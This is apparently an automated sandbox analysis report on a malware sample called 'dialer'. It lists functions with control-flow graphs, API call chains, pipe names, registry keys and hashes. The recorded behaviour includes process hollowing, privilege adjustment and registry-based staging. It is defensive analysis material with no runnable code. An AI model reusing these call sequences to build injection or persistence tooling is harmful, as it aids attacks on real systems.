                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                                Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                                Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                                Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                                Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                                Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Non-executed Functions

                                                                                Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                                Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage:1.3%
                                                                                Dynamic/Decrypted Code Coverage:94.4%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:107
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 22222 1e858985cf0 22223 1e858985cfd 22222->22223 22224 1e858985d09 22223->22224 22232 1e858985e1a 22223->22232 22225 1e858985d3e 22224->22225 22226 1e858985d8d 22224->22226 22227 1e858985d66 SetThreadContext 22225->22227 22227->22226 22228 1e858985e41 VirtualProtect FlushInstructionCache 22228->22232 22229 1e858985efe 22230 1e858985f1e 22229->22230 22244 1e8589843e0 VirtualFree 22229->22244 22240 1e858984df0 GetCurrentProcess 22230->22240 22232->22228 22232->22229 22234 1e858985f23 22235 1e858985f77 22234->22235 22236 1e858985f37 ResumeThread 22234->22236 22245 1e858987940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 22235->22245 22237 1e858985f6b 22236->22237 22237->22234 22239 1e858985fbf 22243 1e858984e0c 22240->22243 22241 1e858984e22 VirtualProtect FlushInstructionCache 22241->22243 22242 1e858984e53 22242->22234 22243->22241 22243->22242 22244->22230 22245->22239 22246 1e85895273c 22247 1e85895276a 22246->22247 22248 1e8589527c5 VirtualAlloc 22247->22248 22250 1e8589528d4 22247->22250 22248->22250 22251 1e8589527ec 22248->22251 22249 1e858952858 LoadLibraryA 22249->22251 22251->22249 22251->22250 22252 1e8589828c8 22253 1e85898290e 22252->22253 22254 1e858982970 22253->22254 22256 1e858983844 22253->22256 22257 1e858983851 StrCmpNIW 22256->22257 22258 1e858983866 22256->22258 22257->22258 22258->22253 22259 1e858983ab9 22262 1e858983a06 22259->22262 22260 1e858983a70 22261 1e858983a56 VirtualQuery 22261->22260 22261->22262 22262->22260 22262->22261 22263 1e858983a8a VirtualAlloc 22262->22263 22263->22260 22264 1e858983abb GetLastError 22263->22264 22264->22260 22264->22262 22265 1e858981abc 22271 1e858981628 GetProcessHeap 22265->22271 22267 1e858981ad2 Sleep SleepEx 22269 1e858981acb 22267->22269 22269->22267 22270 1e858981598 StrCmpIW StrCmpW 22269->22270 22316 1e8589818b4 9 API calls 22269->22316 22270->22269 22272 1e858981648 _invalid_parameter_noinfo 22271->22272 22317 1e858981268 GetProcessHeap 22272->22317 22274 1e858981650 22275 1e858981268 2 API calls 22274->22275 22276 1e858981661 22275->22276 22277 1e858981268 2 API calls 22276->22277 22278 1e85898166a 22277->22278 22279 1e858981268 2 API calls 22278->22279 22280 1e858981673 22279->22280 22281 1e85898168e RegOpenKeyExW 22280->22281 22282 1e8589816c0 RegOpenKeyExW 22281->22282 22283 1e8589818a6 22281->22283 22284 1e8589816e9 22282->22284 22285 1e8589816ff RegOpenKeyExW 22282->22285 22283->22269 22328 1e8589812bc 11 API calls 2 library calls 22284->22328 22287 1e858981723 22285->22287 22288 1e85898173a RegOpenKeyExW 22285->22288 22321 1e85898104c RegQueryInfoKeyW 22287->22321 22290 1e858981775 RegOpenKeyExW 22288->22290 22291 1e85898175e 22288->22291 22295 1e8589817b0 RegOpenKeyExW 22290->22295 22296 1e858981799 22290->22296 22329 1e8589812bc 11 API calls 2 library calls 22291->22329 22292 1e8589816f5 RegCloseKey 22292->22285 22299 1e8589817d4 22295->22299 22300 1e8589817eb RegOpenKeyExW 22295->22300 22330 1e8589812bc 11 API calls 2 library calls 22296->22330 22297 1e85898176b RegCloseKey 22297->22290 22331 1e8589812bc 11 API calls 2 library calls 22299->22331 22303 1e858981826 RegOpenKeyExW 22300->22303 22304 1e85898180f 22300->22304 22301 1e8589817a6 RegCloseKey 22301->22295 22306 1e858981861 RegOpenKeyExW 22303->22306 22307 1e85898184a 22303->22307 22305 1e85898104c 4 API calls 22304->22305 22309 1e85898181c RegCloseKey 22305->22309 22311 1e858981885 22306->22311 22312 1e85898189c RegCloseKey 22306->22312 22310 1e85898104c 4 API calls 22307->22310 22308 1e8589817e1 RegCloseKey 22308->22300 22309->22303 22313 1e858981857 RegCloseKey 22310->22313 22314 1e85898104c 4 API calls 22311->22314 22312->22283 22313->22306 22315 1e858981892 RegCloseKey 22314->22315 22315->22312 22332 1e858996168 22317->22332 22319 1e858981283 GetProcessHeap 22320 1e8589812ae _invalid_parameter_noinfo 22319->22320 22320->22274 22322 1e8589811b5 RegCloseKey 22321->22322 22323 1e8589810bf 22321->22323 22322->22288 22323->22322 22324 1e8589810cf RegEnumValueW 22323->22324 22326 1e858981125 _invalid_parameter_noinfo __free_lconv_num 22324->22326 22325 1e85898114e GetProcessHeap 22325->22326 22326->22322 22326->22324 22326->22325 22327 1e85898116e GetProcessHeap 22326->22327 22327->22326 22328->22292 22329->22297 22330->22301 22331->22308 22333 1e85898554d 22335 1e858985554 22333->22335 22334 1e8589855bb 22335->22334 22336 1e858985637 VirtualProtect 22335->22336 22337 1e858985671 22336->22337 22338 1e858985663 GetLastError 22336->22338 22338->22337 22339 1e8589b273c 22340 1e8589b276a 22339->22340 22341 1e8589b27c5 VirtualAlloc 22340->22341 22342 1e8589b27ec 22340->22342 22341->22342

                                                                                Executed Functions

